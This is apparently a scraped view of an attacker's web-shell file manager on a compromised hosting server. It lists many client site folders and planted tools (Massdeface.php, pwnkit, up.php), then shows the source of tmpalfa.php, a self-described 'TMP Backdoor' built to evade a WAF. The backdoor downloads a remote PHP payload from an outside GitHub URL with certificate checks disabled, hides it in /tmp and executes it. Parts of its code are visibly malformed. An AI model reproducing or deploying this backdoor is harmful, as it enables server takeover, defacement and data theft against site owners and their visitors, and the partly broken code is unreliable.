Gecko [ www.demo2.appsiete.com ]

Name	Size	Permission
.well-known	[ DIR ]	drwxr-xr-x
agropec	[ DIR ]	drwxr-x---
agropec1	[ DIR ]	drwxr-xr-x
alfresco	[ DIR ]	drwxr-x---
altamirano	[ DIR ]	drwxr-x---
anmar	[ DIR ]	drwxr-x---
anmar2	[ DIR ]	drwxr-x---
arkangel	[ DIR ]	drwxr-x---
arkangel1	[ DIR ]	drwxr-x---
baltica	[ DIR ]	drwxr-x---
balticac	[ DIR ]	drwxr-x---
bolivar	[ DIR ]	drwxr-x---
bycfarma	[ DIR ]	drwxr-x---
castro	[ DIR ]	drwxr-x---
celis	[ DIR ]	drwxr-x---
cgi-bin	[ DIR ]	drwxr-xr-x
chalan	[ DIR ]	drwxr-x---
chaska	[ DIR ]	drwxr-x---
chumbes	[ DIR ]	drwxr-x---
cielo	[ DIR ]	drwxr-x---
cielo1	[ DIR ]	drwxr-x---
clevertrading	[ DIR ]	drwxr-x---
consultacpe	[ DIR ]	drwxr-x---
costaverde	[ DIR ]	drwxr-x---
decay_sym	[ DIR ]	drwxr-xr-x
decorho	[ DIR ]	drwxr-x---
delpueblo	[ DIR ]	drwxr-x---
delpueblo2	[ DIR ]	drwxr-x---
demo	[ DIR ]	drwxr-x---
demo2	[ DIR ]	drwxr-x---
divana	[ DIR ]	drwxr-x---
duramacon	[ DIR ]	drwxr-x---
economica	[ DIR ]	drwxr-x---
economica2	[ DIR ]	drwxr-x---
edavid	[ DIR ]	drwxr-x---
eduplast	[ DIR ]	drwxr-x---
elpueblo	[ DIR ]	drwxr-x---
elpueblo2	[ DIR ]	drwxr-x---
farfans	[ DIR ]	drwxr-x---
fernadul	[ DIR ]	drwxr-x---
fserrano	[ DIR ]	drwxr-x---
gelifarma	[ DIR ]	drwxr-x---
gelifarma2	[ DIR ]	drwxr-xr-x
huanca	[ DIR ]	drwxr-x---
innovail	[ DIR ]	drwxr-x---
jeronimo	[ DIR ]	drwxr-x---
joselito	[ DIR ]	drwxr-x---
karyn	[ DIR ]	drwxr-x---
karyn1	[ DIR ]	drwxr-xr-x
katterin	[ DIR ]	drwxr-x---
katterin1	[ DIR ]	drwxr-x---
keysi	[ DIR ]	drwxr-x---
laclave	[ DIR ]	drwxr-x---
laeconomica	[ DIR ]	drwxr-x---
laeconomica2	[ DIR ]	drwxr-x---
lalena2	[ DIR ]	drwxr-x---
larosa	[ DIR ]	drwxr-x---
lastra	[ DIR ]	drwxr-x---
limalab	[ DIR ]	drwxr-x---
margarita	[ DIR ]	drwxr-x---
mario	[ DIR ]	drwxr-x---
marona	[ DIR ]	drwxr-x---
mediperu	[ DIR ]	drwxr-x---
mediperu1	[ DIR ]	drwxr-xr-x
mercedes	[ DIR ]	drwxr-x---
metrito	[ DIR ]	drwxr-x---
mitsur	[ DIR ]	drwxr-x---
mueblinnovac	[ DIR ]	drwxr-x---
nevet	[ DIR ]	drwxr-x---
oliva	[ DIR ]	drwxr-x---
pernocentro	[ DIR ]	drwxr-x---
perufar	[ DIR ]	drwxr-x---
public_html	[ DIR ]	drwxr-x---
qatalaya	[ DIR ]	drwxr-x---
rasza	[ DIR ]	drwxr-x---
reagro	[ DIR ]	drwxr-x---
repuestosedu	[ DIR ]	drwxr-x---
royrepuestos	[ DIR ]	drwxr-x---
salazar	[ DIR ]	drwxr-x---
salazar1	[ DIR ]	drwxr-xr-x
sanjuan	[ DIR ]	drwxr-x---
sazon	[ DIR ]	drwxr-x---
servasa	[ DIR ]	drwxr-x---
smhuarquiza	[ DIR ]	drwxr-x---
stampolo	[ DIR ]	drwxr-x---
stanley	[ DIR ]	drwxr-x---
sullana	[ DIR ]	drwxr-x---
sullana2	[ DIR ]	drwxr-x---
surmin	[ DIR ]	drwxr-x---
surmin2	[ DIR ]	drwxr-x---
survision	[ DIR ]	drwxr-x---
todorico	[ DIR ]	drwxr-x---
trading	[ DIR ]	drwxr-x---
valderrama	[ DIR ]	drwxr-x---
villegas	[ DIR ]	drwxr-x---
visafarma	[ DIR ]	drwxr-x---
warmicha	[ DIR ]	drwxr-x---
warmicha1	[ DIR ]	drwxr-x---
zhongmi	[ DIR ]	drwxr-x---
zhongmi1	[ DIR ]	drwxr-xr-x
.htaccess	281 B	-rw-r--r--
.mad-root	0 B	-rw-r--r--
Massdeface.php	5.18 KB	-rw-r--r--
adminer.php	465.43 KB	-rw-r--r--
index.html	7 B	-rw-r--r--
index.php	31 B	-rw-r--r--
pwnkit	10.99 KB	-rwxr-xr-x
tmpalfa.php	1.27 KB	-rw-r--r--
up.php	24.48 KB	-rw-r--r--

Name

Size

Permission

Action

.well-known

[ DIR ]

drwxr-xr-x

agropec

[ DIR ]

drwxr-x---

agropec1

[ DIR ]

drwxr-xr-x

alfresco

[ DIR ]

drwxr-x---

altamirano

[ DIR ]

drwxr-x---

anmar

[ DIR ]

drwxr-x---

anmar2

[ DIR ]

drwxr-x---

arkangel

[ DIR ]

drwxr-x---

arkangel1

[ DIR ]

drwxr-x---

baltica

[ DIR ]

drwxr-x---

balticac

[ DIR ]

drwxr-x---

bolivar

[ DIR ]

drwxr-x---

bycfarma

[ DIR ]

drwxr-x---

castro

[ DIR ]

drwxr-x---

celis

[ DIR ]

drwxr-x---

cgi-bin

[ DIR ]

drwxr-xr-x

chalan

[ DIR ]

drwxr-x---

chaska

[ DIR ]

drwxr-x---

chumbes

[ DIR ]

drwxr-x---

cielo

[ DIR ]

drwxr-x---

cielo1

[ DIR ]

drwxr-x---

clevertrading

[ DIR ]

drwxr-x---

consultacpe

[ DIR ]

drwxr-x---

costaverde

[ DIR ]

drwxr-x---

decay_sym

[ DIR ]

drwxr-xr-x

decorho

[ DIR ]

drwxr-x---

delpueblo

[ DIR ]

drwxr-x---

delpueblo2

[ DIR ]

drwxr-x---

demo

[ DIR ]

drwxr-x---

demo2

[ DIR ]

drwxr-x---

divana

[ DIR ]

drwxr-x---

duramacon

[ DIR ]

drwxr-x---

economica

[ DIR ]

drwxr-x---

economica2

[ DIR ]

drwxr-x---

edavid

[ DIR ]

drwxr-x---

eduplast

[ DIR ]

drwxr-x---

elpueblo

[ DIR ]

drwxr-x---

elpueblo2

[ DIR ]

drwxr-x---

farfans

[ DIR ]

drwxr-x---

fernadul

[ DIR ]

drwxr-x---

fserrano

[ DIR ]

drwxr-x---

gelifarma

[ DIR ]

drwxr-x---

gelifarma2

[ DIR ]

drwxr-xr-x

huanca

[ DIR ]

drwxr-x---

innovail

[ DIR ]

drwxr-x---

jeronimo

[ DIR ]

drwxr-x---

joselito

[ DIR ]

drwxr-x---

karyn

[ DIR ]

drwxr-x---

karyn1

[ DIR ]

drwxr-xr-x

katterin

[ DIR ]

drwxr-x---

katterin1

[ DIR ]

drwxr-x---

keysi

[ DIR ]

drwxr-x---

laclave

[ DIR ]

drwxr-x---

laeconomica

[ DIR ]

drwxr-x---

laeconomica2

[ DIR ]

drwxr-x---

lalena2

[ DIR ]

drwxr-x---

larosa

[ DIR ]

drwxr-x---

lastra

[ DIR ]

drwxr-x---

limalab

[ DIR ]

drwxr-x---

margarita

[ DIR ]

drwxr-x---

mario

[ DIR ]

drwxr-x---

marona

[ DIR ]

drwxr-x---

mediperu

[ DIR ]

drwxr-x---

mediperu1

[ DIR ]

drwxr-xr-x

mercedes

[ DIR ]

drwxr-x---

metrito

[ DIR ]

drwxr-x---

mitsur

[ DIR ]

drwxr-x---

mueblinnovac

[ DIR ]

drwxr-x---

nevet

[ DIR ]

drwxr-x---

oliva

[ DIR ]

drwxr-x---

pernocentro

[ DIR ]

drwxr-x---

perufar

[ DIR ]

drwxr-x---

public_html

[ DIR ]

drwxr-x---

qatalaya

[ DIR ]

drwxr-x---

rasza

[ DIR ]

drwxr-x---

reagro

[ DIR ]

drwxr-x---

repuestosedu

[ DIR ]

drwxr-x---

royrepuestos

[ DIR ]

drwxr-x---

salazar

[ DIR ]

drwxr-x---

salazar1

[ DIR ]

drwxr-xr-x

sanjuan

[ DIR ]

drwxr-x---

sazon

[ DIR ]

drwxr-x---

servasa

[ DIR ]

drwxr-x---

smhuarquiza

[ DIR ]

drwxr-x---

stampolo

[ DIR ]

drwxr-x---

stanley

[ DIR ]

drwxr-x---

sullana

[ DIR ]

drwxr-x---

sullana2

[ DIR ]

drwxr-x---

surmin

[ DIR ]

drwxr-x---

surmin2

[ DIR ]

drwxr-x---

survision

[ DIR ]

drwxr-x---

todorico

[ DIR ]

drwxr-x---

trading

[ DIR ]

drwxr-x---

valderrama

[ DIR ]

drwxr-x---

villegas

[ DIR ]

drwxr-x---

visafarma

[ DIR ]

drwxr-x---

warmicha

[ DIR ]

drwxr-x---

warmicha1

[ DIR ]

drwxr-x---

zhongmi

[ DIR ]

drwxr-x---

zhongmi1

[ DIR ]

drwxr-xr-x

.htaccess

281 B

-rw-r--r--

.mad-root

0 B

-rw-r--r--

Massdeface.php

5.18 KB

-rw-r--r--

adminer.php

465.43 KB

-rw-r--r--

index.html

7 B

-rw-r--r--

index.php

31 B

-rw-r--r--

pwnkit

10.99 KB

-rwxr-xr-x

tmpalfa.php

1.27 KB

-rw-r--r--

up.php

24.48 KB

-rw-r--r--

Code Editor : tmpalfa.php

<?php

# 6ickzone TMP Backdoor v2

# Bypass 500 Internal Server Error & Blank Output (WAF Evasion Shell)

# Coded by: 0x6ick - Inspired by L0c4lh34rtz / IndoXploit legacy shell

@ini_set('display_errors', 0);

@set_time_limit(0);

@error_reporting(0);

$payload_url = 'https://raw.githubusercontent.com/ZuanXPloit/Test/refs/heads/master/batosay.php';

$tmp_path = '/tmp/.sess_' . substr(md5($_SERVER['HTTP_HOST']), 0, 10) . '.php';

if (isset($_GET['reload']) || !file_exists($tmp_path) || filesize($tmp_path) == 0) {

$payload = get_payload($payload_url);

if (stripos($payload, '<?php') !== false) {

file_put_contents($tmp_path, $payload);

usleep(300000);

}

if (file_exists($tmp_path) && filesize($tmp_path) > 0) {

include_once($tmp_path);

exit;

}

function get_payload($url) {

$ctx = stream_context_create(['http' => ['timeout' => 3]]);

$content = @file_get_contents($url, false, $ctx);

if (!$content) {

$ch = curl_init();

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

$content = curl_exec($ch);

curl_close($ch);

}

return $content;

}

${this.title}

Code Editor : tmpalfa.php